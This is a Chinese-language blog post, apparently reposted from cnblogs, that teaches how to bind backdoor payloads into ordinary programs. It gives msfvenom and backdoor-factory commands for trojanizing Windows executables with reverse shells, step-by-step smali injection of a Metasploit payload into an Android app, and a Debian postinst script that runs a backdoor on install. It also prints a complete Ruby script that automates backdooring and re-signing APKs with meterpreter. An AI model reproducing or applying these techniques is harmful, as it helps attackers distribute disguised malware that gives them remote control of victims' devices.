标签:tap start pass rebuild dma 运行 写入 asi ssi
Payload捆绑注入
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -e ... -f exe > testtmp.exe
backdoor-factory
在指定程序中注入payload backdoor-factory -f Test.exe -S #检测是否支持注入 backdoor-factory -f Test.exe -s show #查看注入payload所需参数 backdoor-factory -f Test.exe -s .... -H <host> -P <Port> -a backdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D #自动搜索应用程序(-i)并注入反弹payload(-a),并删除原文件(-D) -u .moocowwow #-u参数则代表把原文件改为指定拓展名的文件
User supplied shellcode
msfpayload windows/exec CMD=‘calc.exe‘ R > calc.bin backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
veil-evasion
>native/backdoor_factory >set LHOST ..... >set LPORT >set orig_exe /path/要注入的后门程序 >info 查看信息 >generate 生成payload 设置名字时不要加拓展名
APK payload捆绑
(1)ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk (2)d2j-apk-sign 文件名 //重新对生成的APK文件签名(d2j-apk-sign kali自带)
逆向方式捆绑
(1)msfvenom -p ..... payload.apk (2)apktool d /path/payload.apk apktool d /path/Normal_File.apk 把逆向payload中的smail/com中的文件夹复制到正常文件逆向后的smail/com文件夹中 (3)在正常逆向的apk文件中的AndroidManifest.xml搜索‘ LAUNCHER‘ 如android:targetActive="com.facebook.nodex.startup.splashscreen.NodexSplashActivity"> targetActive :程序开始的地方,根据此路径找到NodexSplashActivity.smali文件; (4)在该文件中搜索‘onCreate‘: invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity; ->onCreate(Landroid/os/Bundle;)V 在该语句下方添加一条执行payload的语句: invoke-static {p0},Lcom/metaspolit/stage/Payload;->start(Landroid/content/Context;)V (5)把payload AndroidManifest.xml 中 <user-permission abdroid:name="....">语句添加到正常APK对应位置 (6)重新编译APK文件: apktool b /Normal/ (7)d2j-apk-sign 文件名 #重新签名
Deb安装包中添加后门程序
(1)dpkg -x xx.deb xxx #把xx.deb解包到xxx文件夹 (2)在xxx目录新建DEBIAN(必须大写)文件夹 (3)touch control postinst #在DEBIAN文件夹新建control和postinst文件 (4)nano control #写入软件包的信息,比较重要,如果有错误可能导致无法安装,所以建议直接复制原软件包中 control文件所有内容 (5)复制后门程序到解包文件夹下 /usr/bin 目录里 (6)vi postinst #这个是安装软件是执行的脚本,这个也是我们后门程序运行的关键,内容可参考如下: #!/bin/sh sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor & #执行后门程序,如这里backdoor sudo /usr/bin/xxx -V #安装后显示软件版本信息,这里参数可能不太一样,也可以自定义执行的参数 (7)chmod 555 postinst #postinst的执行权限为>=555且=<775 (8)dpkg-deb --build xxx/ xxx.deb #检查一遍没有问题就可以打包了 本机开始监听,软件发送到目标客户端执行。。。
ruby apk-embed-payload.rb
#!/usr/bin/env ruby # apk_backdoor.rb # This script is a POC for injecting metasploit payloads on http://vinayakwadhwa.in/apk-embed-payload.rb # arbitrary APKs. # Authored by timwr, Jack64 # Redistributed by PFSFX require ‘nokogiri‘ require ‘fileutils‘ require ‘optparse‘ # Find the activity thatapk_backdoor.rb is opened when you click the app icon def findlauncheractivity(amanifest) package = amanifest.xpath("//manifest").first[‘package‘] activities = amanifest.xpath("//activity|//activity-alias") for activity in activities activityname = activity.attribute("name") category = activity.search(‘category‘) unless category next end for cat in category categoryname = cat.attribute(‘name‘) if (categoryname.to_s == ‘android.intent.category.LAUNCHER‘ || categoryname.to_s == ‘android.intent.action.MAIN‘) activityname = activityname.to_s unless activityname.start_with?(package) activityname = package + activityname end return activityname end end end end # If XML parsing of the manifest fails, recursively search # the smali code for the onCreate() hook and let the user # pick the injection point def scrapeFilesForLauncherActivity() smali_files||=[] Dir.glob(‘original/smali*/**/*.smali‘) do |file| checkFile=File.read(file) if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") smali_files << file smalifile = file activitysmali = checkFile end end i=0 print "[*] Please choose from one of the following:\n" smali_files.each{|s_file| print "[+] Hook point ",i,": ",s_file,"\n" i+=1 } hook=-1 while (hook < 0 || hook>i) print "\nHook: " hook = STDIN.gets.chomp.to_i end i=0 smalifile="" activitysmali="" smali_files.each{|s_file| if (i==hook) checkFile=File.read(s_file) smalifile=s_file activitysmali = checkFile break end i+=1 } return [smalifile,activitysmali] end def fix_manifest() payload_permissions=[] #Load payload‘s permissions File.open("payload/AndroidManifest.xml","r"){|file| k=File.read(file) payload_manifest=Nokogiri::XML(k) permissions = payload_manifest.xpath("//manifest/uses-permission") for permission in permissions name=permission.attribute("name") payload_permissions << name.to_s end # print "#{k}" } original_permissions=[] apk_mani=‘‘ #Load original apk‘s permissions File.open("original/AndroidManifest.xml","r"){|file2| k=File.read(file2) apk_mani=k original_manifest=Nokogiri::XML(k) permissions = original_manifest.xpath("//manifest/uses-permission") for permission in permissions name=permission.attribute("name") original_permissions << name.to_s end # print "#{k}" } #Get permissions that are not in original APK add_permissions=[] for permission in payload_permissions if !(original_permissions.include? permission) print "[*] Adding #{permission}\n" add_permissions << permission end end inject=0 new_mani="" #Inject permissions in original APK‘s manifest for line in apk_mani.split("\n") if (line.include? "uses-permission" and inject==0) for permission in add_permissions new_mani << ‘<uses-permission android:name="‘+permission+‘"/>‘+"\n" end new_mani << line+"\n" inject=1 else new_mani << line+"\n" end end File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani } end apkfile = ARGV[0] unless(apkfile && File.readable?(apkfile)) puts "Usage: #{$0} [target.apk] [msfvenom options]\n" puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" exit(1) end jarsigner = `which jarsigner` unless(jarsigner && jarsigner.length > 0) puts "No jarsigner" exit(1) end apktool = `which apktool` unless(apktool && apktool.length > 0) puts "No apktool" exit(1) end apk_v=`apktool` unless(apk_v.split()[1].include?("v2.")) puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n" exit(1) end begin msfvenom_opts = ARGV[1,ARGV.length] opts="" msfvenom_opts.each{|x| opts+=x opts+=" " } rescue puts "Usage: #{$0} [target.apk] [msfvenom options]\n" puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443" puts "[-] Error parsing msfvenom options. Exiting.\n" exit(1) end print "[*] Generating msfvenom payload..\n" res=`msfvenom -f raw #{opts} -o payload.apk 2>&1` if res.downcase.include?("invalid" || "error") puts res exit(1) end print "[*] Signing payload..\n" `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey` `rm -rf original` `rm -rf payload` `cp #{apkfile} original.apk` print "[*] Decompiling orignal APK..\n" `apktool d $(pwd)/original.apk -o $(pwd)/original` print "[*] Decompiling payload APK..\n" `apktool d $(pwd)/payload.apk -o $(pwd)/payload` f = File.open("original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close print "[*] Locating onCreate() hook..\n" launcheractivity = findlauncheractivity(amanifest) smalifile = ‘original/smali/‘ + launcheractivity.gsub(/\./, "/") + ‘.smali‘ begin activitysmali = File.read(smalifile) rescue Errno::ENOENT print "[!] Unable to find correct hook automatically\n" begin results=scrapeFilesForLauncherActivity() smalifile=results[0] activitysmali=results[1] rescue puts "[-] Error finding launcher activity. Exiting" exit(1) end end print "[*] Copying payload files..\n" FileUtils.mkdir_p(‘original/smali/com/metasploit/stage/‘) FileUtils.cp Dir.glob(‘payload/smali/com/metasploit/stage/Payload*.smali‘), ‘original/smali/com/metasploit/stage/‘ activitycreate = ‘;->onCreate(Landroid/os/Bundle;)V‘ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "w") {|file| file.puts hookedsmali } injected_apk=apkfile.split(".")[0] injected_apk+="_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest() print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" `apktool b -o $(pwd)/#{injected_apk} $(pwd)/original` print "[*] Signing #{injected_apk} ..\n" `jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey` puts "[+] Infected file #{injected_apk} ready.\n"
相关链接
http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
http://xiao106347.blog.163.com/blog/static/215992078201401223746744/
Inject Payload Into Normal Files
标签:tap start pass rebuild dma 运行 写入 asi ssi
原文地址:http://www.cnblogs.com/ssooking/p/5932136.html